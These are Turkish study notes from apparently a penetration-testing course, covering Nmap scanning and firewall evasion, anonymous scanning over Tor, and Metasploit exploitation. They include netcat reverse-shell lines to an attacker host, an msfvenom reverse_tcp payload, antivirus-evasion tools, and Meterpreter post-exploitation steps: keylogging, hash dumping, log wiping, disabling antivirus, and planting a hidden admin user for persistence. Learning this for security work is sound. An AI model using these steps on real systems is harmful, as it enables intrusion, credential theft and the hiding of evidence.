--------------------------------------------------------------------------------------
Aktif bilgi toplama
----------------------------------------------------------------------
Nmap temelleri
Nmap tarama yönetemleri
Keşif Aşamaları
Port,Servis,Version Taramaları
İşletim Sistemi Tespiti
Nmap Scripting Engine
Dns,smtp,snmp üzerinden keşif
anonim bilgi toplama
------------------------------------------------------
Pasif bilgileri doğrula
Ip aralğından aktif olan sistemler
Portlar ve servisler
Yazılımlar ve versiyonlar
İşlerim Sistemleri
Detaylı veri elde etme
-----------------------------------------------------
mesele temel teknikleri anlamak
rfc=kural dizisi
bir port taraması yapılır açık olan portlar bulunur
bunun üzerinden çalışan yazılımları görmeliyim
versiyonlarını görmeliyim ki zaafiyetleri varmı.
eger eski bir version ise o eski versionun zaafiyetinden
faydalanabiliriz.
----------------------------------------------------
** Nmap - Network mapping **
Ağ keşif
Port,servis taraması
versiyon tarama
işletim sistemi zafiyeti vb.araştır.
------------------------------------------------------------------------------------------------------------
** Nmap host tanımlama **
subnetmask=alt ağ hesaplama=araştır anlarsın|
nmap ip_adresi
nmap ip_adresi-15
nmap ip_adresi,5,6,7
nmap -iL iplist.txt = bir ip listesi oluştur.o ip listesinindekileri tara.
nmap ip_adresi/24 -exclude ip_adresi = bir network bir bu yeri arama demek için
---------------------------------------------------------------------------------------------------------
Nmap port durumları ve anlamları
Open:port açık
TCP 3-lü el sıkışma.
Syn=varsayılan port tarama tekniğidir.hızlı ve kayıtsız
Tarama işlemi gönderilen SYN paketlerine gelen cevaba göre gerçekleşir.
SYN paketine RST+ACK geliyorsa portun kapalı olduğu.eger SYN+ACK geliyorsa portun açık
oldugu anlaşılır ve cevap olrak RST gönderilir.
SYN scan atni zamanda Half Open Scan olarak bilinir.
nmap -sS 10.0.1.5 = SYN taraması yapmak için
----------------------------------------------------------------------------------------------------------------
İletişime geçildigi için artık karşı tarafında bizden haberi var
dikkatli olmamız gerekiyor yaptıgımız işlemlerde
---------------------------------------------------------------------------------------------------------------
TCP scan-nmap
----------------------------------------------------------------------------------------------------------
TCP connect scan,üşlü el sıkışmayı tamamlar ve loglara düşer.
daha kesin sonuçlar elde edilir.
port durumları SYN paketine gelen cevaba gerçekleşir.

SYN paketine karşılık RST+ACK geliyorsa portun kapalı olduğu anlaşılır.
SYN+ACK geliyorsa portun açık oldgu anlaşılır ve üçlü el sıkışma tamamlanır.
nmap -sT 10.0.1.5
-----------------------------------------------------------------------------------------------------------------------
SYN proxy gelen bütün syn isteklerine syn+ack gönder=yani eger tcp işlemi tamamlanırsa
dikkate alırım,ama eger syn işleminden cevap alınca işlemi keserse dikkate alma gibi bir işle
biraz araştır.otomatik saldırları engelemek için alınmış bir önlemdir.Pentest'lerin dikkat etmesi gereken bir konu
önemli.Güvenilir sonuç için Tcp scan daha kesindir.
------------------------------------------------------------------------------------------------
Nmap UDP Scan
UDP portlarını analiz etmek için kullanılır.
UDP paketlerine gelen cevaba göre analiz yapılır.
Gelen cevap ICMP port Unreachable ise portun kapalıdır.
Gelen cevap UDP paketi ise portun açıktır.
nmap -sU ip_adresi
cevap olarak udp geliyorsa orda bir servis var
eger unreachable geliyorsa servis kapalı.
--------------------------------------------------------------------------------------
Nmap- NULL/FIN/XMAS scan =(FİREWALL'U şaşırmak için araştır)=
Analizleri benzerdir.
Gönderilen pakete RST+ACK dönüyorsa portun kapalı,hiçbir paket dönüyorsa 
portun açık olduğu anlaşılır.
Cevap ICMP Unreachable ile port filtrelidir.
farklı flag degerleri kullanılarak aşılabilir önlemler.veya boş flag gönderilir.
şaşırtma amaçlı.
--------------------------------------------------------------------------------
Nmap- ACK/Windows Scan=(ARAŞTIR FİREWALL'U AŞMAK İÇİN)=
ACK Scan Firewall ayarlarını analizi için sıkca kullanılır.
--------------------------------------------------------------------------------------
Varsayılan portlar bellidir.Bulunabilir.Ama bunlar ayarlanarak degiştirilebilir.
Dolayısıyla sadece tahminsel sonuçlardır.Kesin sonuç istiyorsan.Version taraması yaparız
tek port için yapalım ki süreç uzamasın.Versiondan gerçekten hangi port onu anlayabiliriz.
standartın dışında bişey olsa arayacaktı bulamazsa bulamadım dicekti.
-------------------------------------------------------------------------------------------
nmap -sS -sV komutu ile sonuçlar görülebilir.
işletim sistemi keşfi = nmap -sT -O
time to live = her işletim sistemin de farklılık gösterir.bu degere göre 
hangi işletim sisteme ait oldugu kesdirilebilir.
Açık ve kapalı portların time to live kodlarından hesaplayarak sonuç sunar.
denemeleri yapmadık teorik olarak isledik=sen kevgirde dene uzun işlemler oldugu için
------------------------------------------------------------------------------------------
nmap ip_Adresi -sT -A = bütün version ve sürüm bilgilerini daha detaylı 
şekilde ekrana getirir.Detaylı veri almak için.Ben bu makineye gidereken nerelerden
atladım gbi şeyleri gösteriyor.Firewall varsa şaşırtma yapabilir.
-----------------------------------------------------------------------------------
nmap hiçbişey söylemezsen en çok kullanılan bin(1000) portu tarar.
-p- = komutunu verirsek bütün portları tarar.
parametreler ile en çok kullananılar portları tara
ve sadece şu portu tara şu aralıgı tara gibi parametreler vererek daha ayrıltılı
aramalar yapabilirz.
----------------------------------------------------------------------------------------
windows sistem yönetimi egitmi
-----------------------------------------------------------------------------------------
versiyon taraması nasıl yapılır= yolladıgı ssh komutu ile banner ı çekerek verisonu veriyor.bannerlara sahte yazılar
ile yanlış yöntenlerdime yapılabilir.yapılandırma ayarları ile bunlar sağlanabilir.(yani bu şekilde bizde şaşırma yapabiliriz)
-----------------------------------------------------------------------------------
nmap çıktısını bir dosyanın içne aktarma parametsinide vardır.
her türlü çıktıyı detaylı bir şekilde kayıt tutabilir.grep ile ayıklama 
işlemleri yaparak güzel sonuçlar alabiliriz.
çıktılar önemli parametreleri araştır.
nmap ip_Adresi -sT -oA daka
eger hiçbişey söylemezsek bir ping paketi ile dürter,ondan sonra port taraması yapar,
bu dürtme olayı yanlış yönlendirme ile yanlış saptamalara sebep olabilir.
-------------------------------------------------------------------------------------
Gerekli nmap parametreleri
-h = yardım,nmap ile ilgili herşey mevcut
-T = hız degeri nekdar hızlı tarıycak(varsayılan 3),firewall ile bu hız durumu
esas alanarak engellenebilir.bu hızı verirken firewall'uda düşünmek gerek. 
-Pn= 
-V = 
-v = çıktıları detaylandırır.ara ara not verir.çoklu aramalarda beklesi uzun oldugu için kullanılır
-n = dns çözümlemesi yapma demek
-open = bana sadece açık portları getir demek
-6 = ipv6 aktifleştirme 
--------------------------------------------------------------------------------
nmap = udp taraması
--------------------------------------------------------------------------------
Cloudfare = korumasını araştır.Saldırı türleri hakkında bilgi edin araştırma yap
-----------------------------------------------------------------------------------
Nmap Scripting Engine = Nmap için geliştirilmiş scriptler bir sürü işleve ve amaca 
hitap eder şekilde mevcutttur.Araştır.Kullanışlı olanları kullanmayı ögren.
--scprit ile hangi scprittin çalıştıraılabilegini görebiliriz.
Exploit etme aşamaları = araştır.
smb-brute üzerinden brute-force yapılabilir. 
---------------------------------------------------------------------------------------
Nmap firewall atlatma sistemleri
Paket parçalama yöntemi
ip üzerinden port taraması ypıyor arada Spoofing yapıyor
Sanki tarama geliyormuş gibi bir mac zehirlemesi yapabiliyor-fortinet firewall cihazı
firewall-bypass script'ti = karşı tarafta firewalla yakalanmadan git.
--------------------------------------------------------------------------------------
DNS üzerinden bilgi toplama 
fierce --dns = dns üzerinden bilgi toplamaya yarayan bir araç
fierce --dns zonetransfer.me = ile direkt getirir.
-------------------------------------------------------------------------------------
Zone Transfer
-----------------------------------------------------------------------------------
real ip verme olayını araştır.
-------------------------------------------------------------------------------------
Sık kullanılan keşif araçları
enum4linux=bu makine adı
nbtscan  =
onesixtyone =
snmpwalk
smtp-user-enum
dirb 
YUkardakileri araştır.
-------------------------------------------------------------------------------------------
smtp = bir mail protoklu
netstat kullanımını detaylı ögren
-------------------------------------------------------------------------------------------
Anonim tarama işlemleri
Tor
proxychains=sana bi proyx tanımlıyorum,tor u tanımlıyoruz burdan anonim arama saglayabliyoruz
Nipe - Perl script
proxychains nmap -sT =tor üzerinden anomin tarama gerçekleştirme.
proxychains kullanımını detaylandır.
---------------------------------------------------------------------------------------------
Waf / firewall keşfi
Gönderilen SYN paketine karşılık
SYN-ACK gelir
RST gelir 
karşımızdan gerçekten ne var bilmek lazım
cmd.exe
/etc/shadow
/etc/passwd
cevaplardan çıkarımlar yapılabilir.
baglantı sıfırlanırsa veya zaman aşımana ugrsa IPS vardır.
----------------------------------------------------------------------------------------------
wafw00f = sıkıntılı istekler yapan bi uygulama.firewall keşiflerinde kulllanılır.
ne oldugunu bazen anlar bazen anlamaz karşımızdaki duruma bağlı.
dig = komutu araştır. / ileri seviye web güvenligi araştır.
----------------------------------------------------------------------------------------------
Zafiyet Keşfi
web ve ağ ile alakalı konular.
zafiyet kavramı = uygulamada protkolde  etc. daha önce keşfedilmiş yara atak türüne izin veren sistem
zafiyeti sömürecek koda expolit diyoruz.araç expolit = sömürdükten sonrada payload yapılacak.
amaca yönelik yönelik saldırı payload yapıcagı tahribat.içeri bir ajan yerleştirmek gibi  düşün.
--------------------------------------------------------------------------------------------------
Openvas = Zafiyet keşif aracı 	I Galismero = Zafiyet keşif aracı I Nikto = Zafiyet keşif aracı I W3af             	
	  Açık kaynak		I	      Toolkit		  I	    Açık kaynak		I
	  Gelişmiş özellikler	I				  I				I
	  Güncel		I				  I				I
--------------------------------------------------------------------------------------------------------------
(/) Core impact (/) Netsparker (/) Burpsuite (/) Nessus (/) 
--------------------------------------------------------------------------------------
Exploit aşaması
-------------------------------------------------------------------------------------------------
Zararlı yazılımları kullanma aşamaları
Bi zafiyeti sömürmek için kullandıgımız kod = exploit
Lokal 	exploit = sızdık,yetkimiz çok düşük,ama root olmak istiyoruz,burda işletim sistemi
içindeki zafiyetleri kullanmamız lazım.
remote 	exploit = uzaktan erişim için kullanılmaktadır.
0day 	exploit = 
Dos 	exploit = karşıadaki sistemi crash edicek çalışılamaz hale getirecek.
Web 	exploit = web uygulamaları yönelik geliştirrilen zaafiyetler.
Shellcode = exploit gerçekleştirildikden sonra çalıştırılacak özelletirilmiş binaryler
NOP = no operation, herhangi bir işlevi yok yada hafızadaki yeri ögrenmek için bellegi dolduran bitler
Exploit Veritabanları = Exploit-db,0day.today,Securityfocus.com,ledb.ir 
perl-pytgon-ruby = önemli diller.exploit geliştirilen diller.
ortak exploit geliştirme dili framework çözümü.Exploit Frameworkler.
Metconsoasploit Framework = Payload(otomatik payloadlar ile kolaylık sağlar),exploit,auxiliary(yardımcı araçlar),encoder(güvenlik duvarlarını atlatmak için)
Metasploit kurulumu ve güncellemesine interentten bak.
msfdb inif = veritabnı yapısını indirir.
msfconsole=metaspoit açılır.
db_status = kontrol saglanır.
workspace -a daka = daka adına workspace oluşturtur. silmek için -d komutu kullan.
-------------------------------------------------------------------------------------------------------------------------------------------
-oA daka -sT -Pn -n -T2 -sV -0 --top-port=2000 = etkili bir nmap taraması için baya güzel
------------------------------------------------------------------------------------------------------------------------
service postgresql start = veritabanını açmak için kullanılır.
db_status = veritabanı görüntüleme
services -p 445 = 445 portu olanları göster.
services = servisleri göster.
içerik import etme konusunu iyice araştır.
-------------------------------------------------------------------------------------------
db_import ile istedigimiz dosyayı import edebiliriz.
vulns -h = bilgiler alınabilir.
db_export -f /dosya_dizin. başkasına gönderip çıkartmak için.başkasına gönderiyor diyeri import ediyor kullanmaya devam ediyor
------------------------------------------------------------------------------------------------------------------------
searchsploit redis = arama yapıyor = bir expolit aldık örnek nasıl yazıldıgını nano ile baktık ögrendik içinde ne oldugunu.
---------------------------------------------------------------------------------------------------------------------------------
metaspolit içinde help yazarak ne var ne yok görebiliriz.
-------------------------------------------------------------------------------------------------------------------------------------
Temel komutlar.
| back = geridön | background= arkaplana atıyor | help = neler var hangi parametre hangi işe yarar. | set = ayarları düzenleme işlemi | show = göstermek | run meterpreteri çalıştır use gibi | load unload |
db_nmap ip_adresi -p 445 --scprit smb-vuln-* = exploit buluyoruz.
buldugumuz exploiti = search ile aratıyoruz. bilgileri kontrol ediyoruz.
use expoilt padini giriyoruz. önümüze ayarlar geliyor.belli başlısı var.ordaki ayrıntılı bir araştırma yap
set RHOST ip_adresi diyerek gidiyoruz.
options diyerek parameterenin degitigini görebiliriz.
set payload windows/x64/meterpeter/bind_tcp = payload windows'meterpeter diye bişey yolluyoruz ajan gibi (sömürü payload ile ajan ekledik)
options diyoruz gelen payload ayarlarını kullanıyoruz. exploit gerçekleştirkten sonra RHOST ayaga kalkıcak ve payload ajanımız(meterpreter) aktif olucak :)
ajan içerde :) bundan sonra yapabilcegimiz herşey meterpretere baglı shell diyerek makinenin komut satırına ulaşılabilir.
sysinfo = ile makine bilgilerini görebiliriz.
-----------------------------------------------------------------------------------------------------------------------------------------
bruto force atak basitçe
2 dosya oluşturduk 
set pass_file /root/passlist.txt
set user_
set user_file /root/userlist.txt
run
-------------------------------------------------------------------------------------------------------------------------------------------------
Payload örneklerini araştır.Bu konu önemli.
--------------------------------------------------------------------------------------------------------------------------------------------------
Exploit denemeleri yap.Önemli
--------------------------------------------------------------------------------------------------------------------------------------------------------
Rverse Shell
vuherable gidiyoruz= nc attackker 80 -e /bin/sh attacker = nc -i -p 80
dışardan içeriye 80 vs 443 açık firewall dan dolayı açtıgımız porta gidemeyebiliriz.
meterpreter dışarı çıkar bilgiyi bize getirir.çıkarken firewall sormaz.
nc vulnerable 6667        -------------------------------
nc -l -p 6667 -e /bin/sh  -------------------------------
---------------------------------------------------------
direkt baglantı şansı yok = bind/sh = pivoting = network zıplama.
---------------------------------------------------------------------------------------------------------------------------
msfvenom kullanımını ögren = araştır.
her zaman bir zafiyet kullanamya gerek yok exploit kullanmaya her aman gerek yok.
bir exe üretip bir shell istyebilriz. ayrı bir zararlı yazılım oluşturuyoruz.
bir zararlı dosya ürettik hangi sisteme bulaştıracagız bulaştıgı sistemde 5555 ortunu açıcak
bir web server açıyoruz.start ile başlatıyoruz yani. 5555
bir tane dinleyici açıyoruz (bind nedir neden önemlidir.öögren)
run diyerek çalıştırıyoruz
5555 portuna direk istek atıyor.
bu işlemi yaparken herhangi bir zafiyet yok.kandırma üsülü ile içeriye bir zararlı yazılım gönderdik.
karşı tarafa bir exe gönderip onun çalışmasını ve karşımıza shell in gelmesini beklicez.
-------------------------------------------------------------------------------------------------
Antivirüs atlatma aracları =
--------------------------------------------------------------------------------------------------
Veil-Evasion Payload ayarları =
Veil-Evasion Payload üretme=
Virustotal taraması=
shellter=
yukardakiler hakkında video izleyerek gerekli bilgiyi ögrenebilirim.
----------------------------------------------------------------------------------------------------------------
Post exploit aşaması (asıl mesele)(Önemli)
-------------------------------------------------------------------------------------------------------------------------
active directory = biz bir sürü windows sistemi tek merkezden yönebiliyoruz
bütün katmanlarda windows kullananlar var.sorun çıktıkça üst kata çıkılır.
hem sistemlerin hem de grupların yönetilmesi gerçekleştirilsin(windows a çalışan yönetim) araştır
---------------------------------------------------------------------------------------------------------------------------
Domain exploitation = ana hedef domaini ele geçirme, amaç domain admin olmak.
*(dip not=rat teknolojisi kullanmayı ögren,Kullanılış bir sistem)*
agdaki tüm cigaları tespit etme
etki alanındaki sistemlerin tespiti
şifrelerin hashlerinin elde edilmesi
Şifrelerin tüm networkte denemnmesi
Domain kullancına ait oturumların tespiti
---------------------------
Cihazlara girerken zafiyetler kullanılabilir.
bruto-force yapılabilir.
sistem içerinde ki detaylı bilgi içeren dosyalar ile ek sitemlere sızma işlemi yapılabilir.
-------------------------------------------------------------------------------------------
post exploit---meterpreter
exploit aşaması işlemler
| NT AUTHORTY\system = windows da et yetkili kullanıcı |
| screenshot komutu ile ekran görüntüsü alır  adamın şifresini veya ne yaptıgını görebilirz|
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.2 lport
set payload (payload ayarlarını yapılandırmayı çöz iyice)
upload komutu ile dosyayı yükleme veya gönderme yapılabilir.
download olarak da yapabiliriz.
execute komutu ile karşıda ki exe programını çalıştırabiliriz.
---------------------------------------------------------------------------------------------------------------------
shell diyerek linux ve windows komutlarını çalıştırabiliyoruz.havalı bir isim verelim ki adam silemein mesala systemx vb gibi.
içerde ki kullanıcımızıda adminastör grubuna ekledik.ps diyerek çalışan tüm prosesleri görebiliriz.
sızarken ps deki proseslerin birine sızıyoruz.bu sistemde kalıcı olamayabilirz.
lsass.exe bu proses bilgisayar kapandamadan kapanmaz bu acıdan bu proses e migres olmak taşıma bizi biraz daha güvenil bir yere gitmemizi saglar.
ilk girişte hangi proses girebilecegimizi görebiliyorduk.
----------------------------------------------------------------------------------------------
getsystem = diyerek direk en yetkili olunabilir. 
getuid = user ıd lerini getirir.
sisinfo = makinenin ismi /kullanıcı
-----------------------------------------------------------------------------------------------------------------
enum_firefox
run keylogerecorder -t 20
clearev = bütün izleri sil
run event_manager -c =
killav 
run get_application_list
Meterpreter komut ve parametleri hakkında ayrıntılı bilgi edin.
kalıcılıgı saglamak amaç.arka tarafta bir kullanıcı ekledim adminastor grubuna ekledik
faydalandıgımız zafiyet yamanlandı. o zaman psexec powershell üzerinden işlem yaptrma yapabiliriz.
set SMBuser KULLANICIADI
set SMBPass Şifre
sessions ile bilgileri göreriz.
persistence = komutu hakkında bilgi edin.
hashdump = paralo hash ı kabul eder. paralo gibi
service -p 455 -R remote hosta otamatik olarak 455 portlarını ekle
hedef sistemden 10.0.1.7 den domain kontrol makinesine atladık.
lab ortamını geliştirme ögren (çok çok çok çok çok çok önemli)
domaine üye tüm sistemlere erişebilir hale geldik.
getpid=
lsaax e taşı prosessi migrate i ile geiştir.
screenshot a vncinject ile  giderbilirz.(ama çalışmadı bir hata oldu)
set PAYLOAD windows içinden resim olarak bir yere kaydetip çekmeyi denedik
set Payload windows vncinject sonra run(burdaki kod tam degil)
vncviewer = komutu. destop yok sa bu kullanılır
yetkili kişiye işlem yaptırmıyorsa proses hatası vardır.ama erişm saglamak istiyoruz
payload olarak vncinject  = inject edip arayüze baglantı saglayabiliriz o şekildede görübiliriz
zaman olmadıgı için bıraktık.
----------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------------------
